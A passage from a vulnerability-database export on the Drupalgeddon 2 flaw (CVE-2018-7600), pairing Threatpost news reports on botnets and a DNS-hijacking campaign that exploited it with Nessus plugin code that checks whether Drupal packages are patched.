have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "modified": "2018-10-11T20:24:54", "published": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "bulletinFamily": "info", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "modified": "2018-04-23T22:13:25", "published": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:09:33", "bulletinFamily": "info", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 various countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars are being targeted in the U.S. and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, as traditional security products aren\u2019t designed to monitor DNS requests, said researchers: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nor by exploiting known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for Cisco integrated service router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of impacted CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name system records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users to give them their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. \u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security is ordering all federal agencies to urgently audit DNS security for their domains in the next 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, Middle East and North Africa were linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "modified": "2019-04-17T18:32:06", "published": "2019-04-17T18:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-01-01T07:45:11", "bulletinFamily": "scanner", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.", "modified": "2020-01-02T00:00:00", "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "published": "2018-04-16T00:00:00", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/12/03\");\n\n script_cve_id(\"CVE-2018-7600\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T06:54:54", "bulletinFamily": "scanner", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002", "modified": "2020-01-02T00:00:00", "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "published": "2018-03-29T00:00:00", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/12/03\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:04:32", "bulletinFamily": "scanner", "description": "According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2020-01-02T00:00:00", "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "published": "2018-03-28T00:00:00", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\"CVE-2018-7600\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T06:47:45", "bulletinFamily": "scanner", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 ", "modified": "2020-01-02T00:00:00", "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "published": "2018-03-29T00:00:00", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/12/03\");\n\n script_cve_id(\"CVE-2018-7600\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 